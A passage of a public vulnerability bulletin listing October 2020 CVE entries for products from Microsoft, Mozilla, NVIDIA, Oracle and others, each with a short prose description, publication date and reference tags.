 
Microchip CryptoAuthentication Library CryptoAuthLib prior to 20191122 has a Buffer Overflow (issue 1 of 2). 2020-10-22 not yet calculated CVE-2019-16128
MLIST
MISC
MISC
microsoft — azure_functions
 
An elevation of privilege vulnerability exists in the way Azure Functions validate access keys. An unauthenticated attacker who successfully exploited this vulnerability could invoke an HTTP Function without proper authorization. This security update addresses the vulnerability by correctly validating access keys used to access HTTP Functions., aka ‘Azure Functions Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16904
MISC
microsoft — windows
 
On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don’t have administrative privileges, this vulnerability is only dangerous in setups that are already unsafe. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users. 2020-10-19 not yet calculated CVE-2020-15261
MISC
MISC
CONFIRM
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Installer Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16902
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. The security update addresses the vulnerability by ensuring the Windows kernel image properly handles objects in memory., aka ‘Windows Image Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16892
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka ‘Windows Network Connections Service Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16887
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Event System Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16900
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16935. 2020-10-16 not yet calculated CVE-2020-16916
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations, aka ‘Windows Storage VSP Driver Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16885
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory, aka ‘Windows KernelStream Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16889
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka ‘Windows Kernel Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16890
MISC
mozilla — firefox
 
When a link to an external protocol was clicked, a prompt was presented that allowed the user to choose what application to open it in. An attacker could induce that prompt to be associated with an origin they didn’t control, resulting in a spoofing attack. This was fixed by changing external protocol prompts to be tab-modal while also ensuring they could not be incorrectly associated with a different origin. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15682
MISC
MISC
mozilla — firefox
 
Mozilla developers reported memory safety bugs present in Firefox 81. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15684
MISC
MISC
mozilla — firefox
 
When multiple WASM threads had a reference to a module, and were looking up exported functions, one WASM thread could have overwritten another’s entry in a shared stub table, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15681
MISC
MISC
mozilla — firefox
 
If a valid external protocol handler was referenced in an image tag, the resulting broken image size could be distinguished from a broken image size of a non-existent protocol handler. This allowed an attacker to successfully probe whether an external protocol handler was registered. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15680
MISC
MISC
mozilla — multiple_products
 
Mozilla developers and community members reported memory safety bugs present in Firefox 81 and Firefox ESR 78.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 78.4, Firefox < 82, and Thunderbird < 78.4. 2020-10-22 not yet calculated CVE-2020-15683
MISC
MISC
MISC
MISC
mozilla — network_security_services
 
In Network Security Services (NSS) before 3.46, several cryptographic primitives had missing length checks. In cases where the application calling the library did not perform a sanity check on the inputs it could result in a crash due to a buffer overflow. 2020-10-22 not yet calculated CVE-2019-17006
MISC
MISC
mozilla — network_security_services
 
In Network Security Services before 3.44, a malformed Netscape Certificate Sequence can cause NSS to crash, resulting in a denial of service. 2020-10-22 not yet calculated CVE-2019-17007
MISC
MISC
mozilla — network_security_services
 
In Network Security Services (NSS) before 3.36.7 and before 3.41.1, a malformed signature can cause a crash due to a null dereference, resulting in a Denial of Service. 2020-10-22 not yet calculated CVE-2018-18508
MISC
MISC
netwrix — account_lockout_examiner
 
Netwrix Account Lockout Examiner before 5.1 allows remote attackers to capture the Net-NTLMv1/v2 authentication challenge hash of the Domain Administrator (that is configured within the product in its installation state) by generating a single Kerberos Pre-Authentication Failed (ID 4771) event on a Domain Controller. 2020-10-20 not yet calculated CVE-2020-15931
CONFIRM
MISC
nvidia — geforce_experience
 
NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in the ShadowPlay component which may lead to local privilege escalation, code execution, denial of service or information disclosure. 2020-10-23 not yet calculated CVE-2020-5990
CONFIRM
nvidia — geforce_experience
 
NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in its services in which a folder is created by nvcontainer.exe under normal user login with LOCAL_SYSTEM privileges which may lead to a denial of service or escalation of privileges. 2020-10-23 not yet calculated CVE-2020-5978
CONFIRM
nvidia — geforce_experience
 
NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in NVIDIA Web Helper NodeJS Web Server in which an uncontrolled search path is used to load a node module, which may lead to code execution, denial of service, escalation of privileges, and information disclosure. 2020-10-23 not yet calculated CVE-2020-5977
CONFIRM
object-path — object-path
 
A prototype pollution vulnerability has been found in `object-path` <= 0.11.4 affecting the `set()` method. The vulnerability is limited to the `includeInheritedProps` mode (if version >= 0.11.0 is used), which has to be explicitly enabled by creating a new instance of `object-path` and setting the option `includeInheritedProps: true`, or by using the default `withInheritedProps` instance. The default operating mode is not affected by the vulnerability if version >= 0.11.0 is used. Any usage of `set()` in versions < 0.11.0 is vulnerable. The issue is fixed in object-path version 0.11.5. As a workaround, don’t use the `includeInheritedProps: true` options or the `withInheritedProps` instance if using a version >= 0.11.0. 2020-10-19 not yet calculated CVE-2020-15256
MISC
CONFIRM
octopus — octupus_deploy
 
An issue was discovered in Octopus Deploy through 2020.4.4. If enabled, the websocket endpoint may allow an untrusted tentacle host to present itself as a trusted one. 2020-10-22 not yet calculated CVE-2020-27155
MISC
MISC
MISC
MISC
omniauth-auth0 — omniauth-auth0
 
omniauth-auth0 (rubygems) versions >= 2.3.0 and < 2.4.1 improperly validate the JWT token signature when using the `jwt_validator.verify` method. Improper validation of the JWT token signature can allow an attacker to bypass authentication and authorization. You are affected by this vulnerability if all of the following conditions apply: 1. You are using `omniauth-auth0`. 2. You are using `JWTValidator.verify` method directly OR you are not authenticating using the SDK’s default Authorization Code Flow. The issue is patched in version 2.4.1. 2020-10-21 not yet calculated CVE-2020-15240
MISC
CONFIRM
MISC
open-xchange — ox_app_suite
 
OX App Suite through 7.10.3 allows stats/diagnostic?param= XSS. 2020-10-23 not yet calculated CVE-2020-15004
MISC
MISC
open-xchange — ox_app_suite
 
OX App Suite through 7.10.3 allows Information Exposure because a user can obtain the IP address and User-Agent string of a different user (via the session API during shared Drive access). 2020-10-23 not yet calculated CVE-2020-15003
CONFIRM
MISC
open-xchange — ox_app_suite
 
OX App Suite through 7.10.3 allows SSRF via the /ajax/messaging/message message API. 2020-10-23 not yet calculated CVE-2020-15002
CONFIRM
MISC
openstack — blazer_dashboard
 
An issue was discovered in OpenStack blazar-dashboard before 1.3.1, 2.0.0, and 3.0.0. A user allowed to access the Blazar dashboard in Horizon may trigger code execution on the Horizon host as the user the Horizon service runs under (because the Python eval function is used). This may result in unauthorized access to the Horizon host and further compromise of the Horizon service. All setups using the Horizon dashboard with the blazar-dashboard plugin are affected. 2020-10-16 not yet calculated CVE-2020-26943
MLIST
MISC
MISC
MISC
MISC
MISC
MISC
CONFIRM
oracle — bi-publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14842
MISC
oracle — bi_publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite – XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14880
MISC
oracle — bi_publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14780
MISC
oracle — bi_publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite – XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14879
MISC
oracle — bi_publisher
 
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Mobile Service). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14784
MISC
oracle — business_intelligence_enterprise_edition
 
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14843
MISC
oracle — communications_diameter_signaling_router
 
Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14788
MISC
oracle — communications_diameter_signaling_router
 
Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14787
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Diagnostics). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Object Library, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14840
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Trade Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14876
MISC
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle CRM Technical Foundation. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14774
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14831
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Marketing accessible data as well as unauthorized access to critical data or complete access to all Oracle Marketing accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14875
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14851
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Flex Fields). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle CRM Technical Foundation, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle CRM Technical Foundation accessible data as well as unauthorized update, insert or delete access to some of Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14850
MISC
oracle — hospitality_opera_5_property_services
 
Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hospitality OPERA 5 Property Services accessible data as well as unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 Property Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14877
MISC
oracle — hospitality_res_3700
 
Vulnerability in the Oracle Hospitality RES 3700 product of Oracle Food and Beverage Applications (component: CAL). The supported version that is affected is 5.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Hospitality RES 3700. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Hospitality RES 3700 accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14783
MISC
oracle — hyperion
 
Vulnerability in the Hyperion Lifecycle Management product of Oracle Hyperion (component: Shared Services). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Lifecycle Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Lifecycle Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14772
MISC
oracle — hyperion
 
Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Hyperion BI+ accessible data. CVSS 3.1 Base Score 2.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14770
MISC
oracle — hyperion
 
Vulnerability in the Hyperion Analytic Provider Services product of Oracle Hyperion (component: Smart View Provider). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the Hyperion Analytic Provider Services executes to compromise Hyperion Analytic Provider Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion Analytic Provider Services accessible data as well as unauthorized read access to a subset of Hyperion Analytic Provider Services accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Hyperion Analytic Provider Services. CVSS 3.1 Base Score 4.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14768
MISC
oracle — hyperion_infrastructure_technology
 
Vulnerability in the Hyperion Infrastructure Technology product of Oracle Hyperion (component: UI and Visualization). The supported version that is affected is 11.1.2.4. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Infrastructure Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Infrastructure Technology accessible data as well as unauthorized access to critical data or complete access to all Hyperion Infrastructure Technology accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14854
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). 2020-10-21 not yet calculated CVE-2020-14779
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14782
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14781
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14792
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14798
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14797
CONFIRM
MISC
oracle — java_se
 
